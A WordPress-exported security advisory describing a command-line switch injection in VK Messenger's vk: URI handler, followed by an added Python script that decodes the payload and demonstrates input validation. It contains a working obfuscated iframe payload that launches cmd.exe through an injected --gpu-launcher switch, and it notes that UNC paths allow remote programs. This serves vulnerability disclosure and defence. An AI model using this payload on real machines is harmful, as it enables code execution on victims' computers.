{"id":11741,"date":"2018-03-14T14:20:43","date_gmt":"2018-03-14T22:20:43","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5511\/"},"modified":"2018-03-14T14:20:43","modified_gmt":"2018-03-14T22:20:43","slug":"news-5511","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5511\/","title":{"rendered":"SSD Advisory &#8211; VK Messenger (VKontakte) vk:\/\/ URI Handler Commands Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus | Date: Sun, 11 Mar 2018 10:51:34 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following describes a vulnerability in VK Messenger: the vk: URI that the browser hands to the application is not handled properly, which lets a web page inject command-line switches into vk.exe and execute arbitrary commands.<\/p>\n<p>VK (VKontakte; [..], meaning InContact) is &#8220;an online social media and social networking service. It is available in several languages. VK allows users to message each other publicly or privately, to create groups, public pages and events, share and tag images, audio and video, and to play browser-based games. 
It is based in Saint Petersburg, Russia&#8221;.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected Version<\/strong><br \/> VK Messenger version 3.1.0.143<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vendor responded that the problem no longer affects the latest version, but did not say when it was fixed or whether the fix resulted from someone else reporting this vulnerability.<br \/> <span id=\"more-3674\"><\/span><br \/> VK Messenger, which is part of the VK package, registers a URI handler for the vk: scheme on Windows with the following registry keys; vk.exe is launched with the URI substituted for the quoted %1 argument:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a03aa34fa079791470\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">[HKEY_CLASSES_ROOT\\vk]\n&quot;URL Protocol&quot;=&quot;&quot;\n@=&quot;URL:vk&quot;\n\n[HKEY_CLASSES_ROOT\\vk\\shell]\n\n[HKEY_CLASSES_ROOT\\vk\\shell\\open]\n\n[HKEY_CLASSES_ROOT\\vk\\shell\\open\\command]\n@=&quot;\\&quot;C:\\\\Program Files\\\\VK\\\\vk.exe\\&quot; \\&quot;%1\\&quot;&quot;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><strong>Vulnerability<\/strong><br \/> The handler above passes the URI to vk.exe as the quoted argument &quot;%1&quot;, and vk.exe does not validate it. A double quote inside a &#8216;vk:&#8217; URI closes that argument, so whatever follows it is parsed as additional command-line switches for vk.exe; a web page that navigates to such a URI therefore controls the argument list of the launched process. Two injected switches are enough for code execution: &#8216;--gpu-launcher=&#8217; (a Chromium switch naming a wrapper program that is run when the GPU process is started) and &#8216;--browser-subprocess-path=&#8217; (which sets the executable used for the application&#8217;s helper subprocesses); with either one, vk.exe executes an attacker-chosen program. 
UNC paths on network shares are accepted for these values as well, so the program to be executed does not need to be present on the victim&#8217;s machine beforehand.<\/p>\n<p>Example of the attack, with the injected part of the URI HTML-entity-encoded so that it is only decoded when the browser parses the iframe&#8217;s src attribute; the URI the handler receives decodes to <code>vk:?&quot; --gpu-launcher=&quot;cmd.exe \/c start calc&quot; --<\/code>, where the leading quote closes the handler&#8217;s &quot;%1&quot; argument and the trailing -- absorbs the quote that follows %1 in the registered command:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a03aa3506609012997\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;iframe 
src=&#8217;vk:?&#8221;&amp;#32;&amp;#45;&amp;#45;&amp;#103;&amp;#112;&amp;#117;&amp;#45;&amp;#108;&amp;#97;&amp;#117;&amp;#110;&amp;#99;&amp;#104;&amp;#101;&amp;#114;&amp;#61;&amp;#34;&amp;#99;&amp;#109;&amp;#100;&amp;#46;&amp;#101;&amp;#120;&amp;#101;&amp;#32;&amp;#47;&amp;#99;&amp;#32;&amp;#115;&amp;#116;&amp;#97;&amp;#114;&amp;#116;&amp;#32;&amp;#99;&amp;#97;&amp;#108;&amp;#99;&amp;#34;&amp;#32;&amp;#45;&amp;#45;&#8217;&gt;&lt;\/iframe&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a03aa3506609012997-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5aa9a03aa3506609012997-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">iframe <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;vk:?&#8221;&amp;#32;&amp;#45;&amp;#45;&amp;#103;&amp;#112;&amp;#117;&amp;#45;&amp;#108;&amp;#97;&amp;#117;&amp;#110;&amp;#99;&amp;#104;&amp;#101;&amp;#114;&amp;#61;&amp;#34;&amp;#99;&amp;#109;&amp;#100;&amp;#46;&amp;#101;&amp;#120;&amp;#101;&amp;#32;&amp;#47;&amp;#99;&amp;#32;&amp;#115;&amp;#116;&amp;#97;&amp;#114;&amp;#116;&amp;#32;&amp;#99;&amp;#97;&amp;#108;&amp;#99;&amp;#34;&amp;#32;&amp;#45;&amp;#45;&#8217;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">iframe<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>When opening a 
malicious page, the browser shows a confirmation box asking the user whether to open VK; the injected switches reach vk.exe once the user accepts.<\/p>\n<p>NOTE: The application is not registered as an auto-start item, and the injection works only when the application is not already running. <\/p>\n<p>The proof-of-concept code accompanies the original advisory as an attachment. <\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3674\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus | Date: Sun, 11 Mar 2018 10:51:34 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following describes a vulnerability in VK Messenger that is triggered via the exploitation of improperly handled URI. VK (VKontakte; [..], meaning InContact) is &#8220;an online social media and social networking service. It is available in several languages. 
VK allows users to message each other publicly or privately, to create groups, public pages &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3674\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; VK Messenger (VKontakte) vk:\/\/ URI Handler Commands Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757,17763],"class_list":["post-11741","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauth"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11741","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11741"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11741\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11741"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11741"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11741"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
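The Vulnerability section of the advisory above explains the injection in prose. The following Python script, added here as an illustration and not part of the SSD advisory or of VK's software, decodes the advisory's HTML-entity payload, applies the Windows command-line splitting rules to the registered handler command, shows the switches vk.exe ends up with, and places the validation check a URI handler should perform next to it. The argv splitter is a simplified implementation of the MSVC runtime rules (the same rules CommandLineToArgvW applies; it omits the `""` literal-quote rule inside a quoted argument), and the benign URI `vk://im?sel=123` is made up for the comparison, not a documented VK deep link.

```python
"""Added example (not part of the SSD advisory and not VK's code): show how the
advisory's HTML-entity-encoded vk: URI becomes extra command-line switches for
vk.exe, and the validation a URI handler should apply before launching anything.

Assumptions: the handler command comes from the advisory's registry export; the
argv splitting follows the MSVC runtime's command-line rules (those applied by
CommandLineToArgvW), simplified by omitting the "" rule for a literal quote
inside a quoted argument; the benign URI vk://im?sel=123 is made up for
illustration, not a documented VK deep link.
"""
import html
import re

# Value of HKEY_CLASSES_ROOT\vk\shell\open\command from the advisory; %1 is the
# URI the browser hands over.
HANDLER_TEMPLATE = r'"C:\Program Files\VK\vk.exe" "%1"'

# src attribute of the advisory's iframe (constructed from the PoC). The page
# shows it double-encoded (&amp;#32;...); this is the single-encoded form the
# browser sees in the attribute and decodes before dispatching to the handler.
PAYLOAD_ATTR = (
    'vk:?"&#32;&#45;&#45;&#103;&#112;&#117;&#45;&#108;&#97;&#117;&#110;&#99;'
    '&#104;&#101;&#114;&#61;&#34;&#99;&#109;&#100;&#46;&#101;&#120;&#101;&#32;'
    '&#47;&#99;&#32;&#115;&#116;&#97;&#114;&#116;&#32;&#99;&#97;&#108;&#99;'
    '&#34;&#32;&#45;&#45;'
)

# Characters RFC 3986 allows in a URI. Whitespace and '"' are not among them,
# which is exactly what the injection relies on.
SAFE_VK_URI = re.compile(r"^vk:[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]*$")


def decode_attribute(attr: str) -> str:
    """Apply the browser's attribute-value entity decoding."""
    return html.unescape(attr)


def windows_argv(cmdline: str) -> list[str]:
    """Split a command line into argv the way the Windows C runtime does.

    Whitespace separates arguments; a double quote toggles quoted mode and is
    not copied; a run of backslashes is literal unless it precedes a double
    quote, in which case 2n backslashes give n backslashes plus a quote toggle
    and 2n+1 give n backslashes plus a literal quote.
    """
    argv, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            run = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (run // 2))
                if run % 2:
                    cur.append('"')          # escaped literal quote
                else:
                    in_quotes = not in_quotes
                i = j + 1
            else:
                cur.append("\\" * run)
                i = j
            have_arg = True
        elif c == '"':
            in_quotes = not in_quotes
            have_arg = True
            i += 1
        elif c in " \t" and not in_quotes:
            if have_arg:
                argv.append("".join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg = True
            i += 1
    if have_arg:
        argv.append("".join(cur))
    return argv


def handler_argv(uri: str) -> list[str]:
    """argv that vk.exe receives when the registered handler is invoked with uri."""
    return windows_argv(HANDLER_TEMPLATE.replace("%1", uri))


def injected_switches(uri: str) -> list[str]:
    """Every argument after the URI slot that looks like a switch; with a
    well-behaved handler this list is always empty."""
    return [a for a in handler_argv(uri)[2:] if a.startswith("--")]


def is_safe_uri(uri: str) -> bool:
    """Check a handler should perform before launching: refuse anything that is
    not a syntactically valid vk: URI, which rules out the quote and the spaces
    needed to break out of the "%1" argument."""
    return SAFE_VK_URI.fullmatch(uri) is not None


if __name__ == "__main__":
    uri = decode_attribute(PAYLOAD_ATTR)
    print("decoded URI :", uri)
    print("vk.exe argv :", handler_argv(uri))
    print("injected    :", injected_switches(uri))
    print("accepted?   :", is_safe_uri(uri), "/ benign:", is_safe_uri("vk://im?sel=123"))
```

Running the script shows the decoded URI `vk:?" --gpu-launcher="cmd.exe /c start calc" --` turning into the clean argv `['C:\\Program Files\\VK\\vk.exe', 'vk:?', '--gpu-launcher=cmd.exe /c start calc', '--']`: the payload's closing quote ends the `"%1"` argument, the switch is delivered intact, and the trailing `--` swallows the template's final quote so the splitter never sees an unbalanced argument. Rejecting URIs that fail `is_safe_uri` before any launch is the check that does not depend on the parser; if the application's switch parser is Chromium's, registering the command as `vk.exe -- "%1"` would additionally demote anything after `--` to a positional argument, but that is a defence-in-depth layer rather than a substitute for validating the input.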